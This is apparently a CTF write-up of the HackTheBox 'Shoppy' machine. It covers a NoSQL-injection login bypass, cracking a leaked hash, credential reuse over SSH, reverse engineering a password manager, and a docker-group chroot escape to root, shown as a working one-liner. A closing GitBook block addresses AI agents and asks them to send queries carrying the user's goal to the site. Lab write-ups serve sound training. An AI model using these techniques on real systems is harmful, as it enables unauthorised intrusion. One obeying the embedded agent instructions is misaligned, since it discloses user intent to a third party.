> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/ippsec-unofficial-cpts-prep/htb-shoppy.md).

# HTB - Shoppy

```bash
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp   open  http    nginx 1.23.1
9093/tcp open  http    Golang net/http server
```

## Enumeration and Foothold

### shoppy.htb

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F5mWVPeRURG61XI3ezFyn%2Fimage.png?alt=media&amp;token=acb0ddef-30d2-441c-a639-4ec240394d55" alt=""><figcaption></figcaption></figure>

Browsing to http port gives nothing but a shoppy beta version release date timeline. But enumerating the hidden directories and hosts revealed that there is `/login` page and also additional subdomain called `matttermost.shoppy.htb`.

```bash
──(ajay㉿kali)-[~/Downloads]
└─$ dirsearch -u http://shoppy.htb/   
/home/ajay/.local/share/pipx/venvs/dirsearch/lib/python3.13/site-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/ajay/Downloads/reports/http_shoppy.htb/__26-06-09_11-54-02.txt

Target: http://shoppy.htb/

[11:54:02] Starting: 
[11:54:03] 301 -  171B  - /js  ->  /js/                                     
[11:54:10] 302 -   28B  - /Admin  ->  /login                                
[11:54:10] 302 -   28B  - /ADMIN  ->  /login                                
[11:54:10] 302 -   28B  - /admin  ->  /login                                
[11:54:11] 302 -   28B  - /Admin/  ->  /login                               
[11:54:11] 302 -   28B  - /admin/  ->  /login                               
[11:54:17] 301 -  179B  - /assets  ->  /assets/                             
[11:54:22] 301 -  173B  - /css  ->  /css/                                   
[11:54:26] 200 -  208KB - /favicon.ico                                      
[11:54:26] 301 -  177B  - /fonts  ->  /fonts/                               
[11:54:29] 301 -  179B  - /images  ->  /images/                             
[11:54:32] 200 -    1KB - /login                                            
[11:54:32] 200 -    1KB - /login/                                           
                                                                             
Task Completed

```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FBgyTtKmigYk5Bbhv9mD6%2Fimage.png?alt=media&amp;token=57f26fa1-5c66-456d-8a07-0b27a2f92ff6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8GzDMjgGrWmpXRgXEqMZ%2Fimage.png?alt=media&amp;token=fdd2e6f9-7105-48d3-8f7e-87f268e37824" alt=""><figcaption></figcaption></figure>

Weak credentials like admin:admin do not work.

But when examining the login portal for SQL injection vulnerability found that the portal is vulnerable to NOSQL injection attack.

### NoSQL Injection Attack

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FlJ4WbMLgTW4xllH8ny8N%2Fimage.png?alt=media&amp;token=67f5a335-f4c0-4081-81c4-a543136db76f" alt=""><figcaption></figcaption></figure>

The 504 Gateway Timeout on `username='` is a strong indicator of **NoSQL Injection** against a MongoDB backend. The single quote caused a query parse error or infinite loop, confirming the app is vulnerable. The login likely constructs a MongoDB query like:

`db.users.findOne({ username: INPUT, password: INPUT })`

A malformed input (`'`) breaks the query and hangs the backend — classic NoSQL injection signal.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FhP1po5bkfaLRz3DHMX64%2Fimage.png?alt=media&amp;token=3dbc55fd-799c-44fb-823a-098e7005cd1a" alt=""><figcaption></figcaption></figure>

Using the Null Byte `%00` i was able to bypass the login page.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FgWrDTjYycp2HFWoEDFxH%2Fimage.png?alt=media&amp;token=2af27196-898b-476c-81f5-0ae222d287ac" alt=""><figcaption></figcaption></figure>

There is a search for users option on the admin panel.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDcTcGC53yDutv3iR5Fkv%2Fimage.png?alt=media&amp;token=4b8c0e27-151e-4ca1-ad4c-a69f0f5a1623" alt=""><figcaption></figcaption></figure>

if no match then it returns to : `W/"a01-ISB6B7RD1nACsgg42wliEwlfq2U”`

searching for admin reveals there is a user export option.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FcZT128HER1UqygYICTok%2Fimage.png?alt=media&amp;token=0dc861dd-6473-40ee-a148-5a65175144f0" alt=""><figcaption></figcaption></figure>

i can use the download export option to view the file.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FrMjby3Aho4iMaqEhUhyI%2Fimage.png?alt=media&amp;token=8b15d057-7962-4b1c-b968-c27263e4f233" alt=""><figcaption></figcaption></figure>

it leaks the username of admin and its password.

Let me use true conditions to see if we can enumerate any other users as the application is already vulnerable to NoSQL injection.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8x6boxSrqfe5r9wtkwNE%2Fimage.png?alt=media&amp;token=bf3f0ad3-964d-467a-b066-1a1b444ce31c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FZNjaCZ1xWP84MHitpZv6%2Fimage.png?alt=media&amp;token=cca5d2b5-9d84-481d-b51a-8c00dff29eec" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDedyK1YPiY8oE6mIcRUS%2Fimage.png?alt=media&amp;token=e12a3d6a-01ef-47c8-9143-f9c002b2ec68" alt=""><figcaption></figcaption></figure>

```bash
"username":"josh","password":"6ebcea65320589ca4f2f1ce039975995"
```

got josh username and password.

crackstation cracked the password of the user josh.

There is a mattermost vhost we have identified earlier, which i can enumerate further.

### mattermost.shoppy.htb

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8flw6n9ZCeUsXrzE92Tk%2Fimage.png?alt=media&amp;token=beec1e7b-36d6-49d8-bdf4-a9e1258a9688" alt=""><figcaption></figcaption></figure>

i can try login with josh creds and it works.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fjt6mqhKb0xR0Gee3FomP%2Fimage.png?alt=media&amp;token=ad80e248-a5b4-4414-a2a4-a560f7c76769" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FtCO92vGS3BwcUhdQn74d%2Fimage.png?alt=media&amp;token=de57e7a7-7440-445a-b74c-8a156f3e9adf" alt=""><figcaption></figcaption></figure>

there are creds for jeager and i can try logging with the creds through ssh.

## Shell as Jaeger

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FAD5lo9EAEHUwugQOawyt%2Fimage.png?alt=media&amp;token=84c093ab-1171-4775-87c4-267b31bdf1f3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FUM2TRd70vdALn2wriJZj%2Fimage.png?alt=media&amp;token=7dd3a410-1164-4b01-aaf4-4d3b971afb08" alt=""><figcaption></figcaption></figure>

Back on the Deploy machine channel there is a conversation about deploying a machine through docker also the development channel talks about a password manager which is on the machine.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FOlixjhusEF7a5XZPrp8u%2Fimage.png?alt=media&amp;token=f53e0d44-beda-41f0-9010-550b3537773d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FcbbZO1RK1vGYSj5c1mRd%2Fimage.png?alt=media&amp;token=22e9c6a4-a501-49be-9cca-51cf802a1807" alt=""><figcaption></figcaption></figure>

There is a script called `shoppy_start.sh` It's just the startup script for the Shoppy Node.js web app. It's likely called on boot or by a service to keep the app running.

```bash
jaeger@shoppy:~$ cat shoppy_start.sh 
#!/bin/bash

export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

cd /home/jaeger/ShoppyApp && npm start
jaeger@shoppy:~$ 
```

When enumerating the privileges of jaeger, he can run the following command as deploy.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FgO4dGH3V8ilJ4M1Fe8DD%2Fimage.png?alt=media&amp;token=a4816536-e89b-45ed-b790-75528636fc7c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FignKXanOQO8tknSDCNfM%2Fimage.png?alt=media&amp;token=987d2d2b-f21f-4577-995c-25951d658db0" alt=""><figcaption></figcaption></figure>

There the `password-manager` josh was talking about. there is also creds.txt but cant access.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9FE5cNRUAZF9i0FwdknU%2Fimage.png?alt=media&amp;token=32549cea-3682-4119-9b5f-9b3e835fd725" alt=""><figcaption></figcaption></figure>

Accessing it says i need password for josh, but the already available pass of josh do not work. As the password manager is built using c++ which josh talks about i can see if the file leaks the master password by using Ghidra.

What i can do it copy the file to my attack machine and use Ghidra to reverse engineer it to see i can get passwords.

### Reverse Engineering With Ghidra.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FkQ8BA8Qf9ru2uk5qxzVM%2Fimage.png?alt=media&amp;token=cf19da10-afcc-464a-8022-5624e7755d4d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fn7jDrwGkDI7Ej7w23uWc%2Fimage.png?alt=media&amp;token=509a3855-dc4c-440c-b2c8-590f0bc4395a" alt=""><figcaption></figcaption></figure>

Found the master password. `Sample`

Using the master password i can read the contents of password-manager. which on reading leaked the credentials of deploy.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FcgLUBAnuVD6xBtlai2O8%2Fimage.png?alt=media&amp;token=c7d72a2f-4cd9-494d-8a8d-4c4bef1a5b46" alt=""><figcaption></figcaption></figure>

## Shell as Deploy

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F80YcxjLzGRwSwJKXhEzY%2Fimage.png?alt=media&amp;token=7ef40032-5bf7-425e-957a-7edf2f257d85" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FBPK18kLMBKuky4BMiEF9%2Fimage.png?alt=media&amp;token=8bac89ff-5c9c-4a22-98bb-6fb73d3eb90e" alt=""><figcaption></figcaption></figure>

deploy is part of docker group which means i can utlize this privilege and escalate to root.

### Exploiting Docker Group

List all docker images

```bash
$ docker images
REPOSITORY   TAG       IMAGE ID       CREATED       SIZE
alpine       latest    d7d3d98c851f   3 years ago   5.53MB
$ 
```

Alpine is available which i can use to escalate to root.

```bash
$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# whoami
root
# 
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F3Ekd2vX52EjEDZyNBgBn%2Fimage.png?alt=media&amp;token=e4eeac69-b1ec-4e41-ade6-5bcef0eab882" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the following URL with the `ask` and `goal` query parameters:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/ippsec-unofficial-cpts-prep/htb-shoppy.md?ask=<question>&goal=<user_goal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is what the user is ultimately trying to achieve, the reason they need the answer. Sharing it helps GitBook give you a better, more relevant answer. A goal is most helpful when it describes the outcome the user wants rather than restating the question. For example, with `ask=how do I create an API token`, a goal like `build a script that syncs our docs to a CMS` lets GitBook tailor the answer to that use case.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
